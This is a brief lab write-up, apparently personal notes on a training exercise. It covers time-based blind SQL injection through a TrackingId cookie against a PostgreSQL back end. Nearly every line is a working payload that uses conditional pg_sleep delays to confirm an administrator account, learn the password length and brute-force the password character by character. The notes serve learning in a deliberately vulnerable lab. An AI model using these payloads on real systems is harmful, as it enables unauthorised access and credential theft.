Sqli Lab 15

TrackingId=4uRy41ySXO12ar7Q' || (SELECT pg_sleep(5)) ||' it give us 5s delay.
TrackingId=4uRy41ySXO12ar7Q' || (SELECT CASE WHEN (1=1) THEN pg_sleep(5) ELSE pg_sleep(-1) END) ||' This query give 5s delay.
TrackingId=4uRy41ySXO12ar7Q' || (SELECT CASE WHEN (1=2) THEN pg_sleep(5) ELSE pg_sleep(-1) END) ||' Not give me any delay.
TrackingId=4uRy41ySXO12ar7Q' || (SELECT CASE WHEN (username='administrator') THEN pg_sleep(5) ELSE pg_sleep(-1) END FROM users) ||' It give 5s delay because in users table a username is administrator
TrackingId=4uRy41ySXO12ar7Q' || (SELECT CASE WHEN (username='administrator' AND LENGTH(password)=20) THEN pg_sleep(5) ELSE pg_sleep(-1) END FROM users) ||' This give 5s delay so password length is 20
By Intruder attack using the query TrackingId=4uRy41ySXO12ar7Q' || (SELECT CASE WHEN (username='administrator' AND SUBSTRING(password,§1§,1)='§a§') THEN pg_sleep(5) ELSE pg_sleep(-1) END FROM users) ||' here 1 is 1 to 20 and a is a to z and 0 to 9
After the attack we get 20sibzsitioukfihc3tx (change every time)
Login and solve the lab.

Quartz 4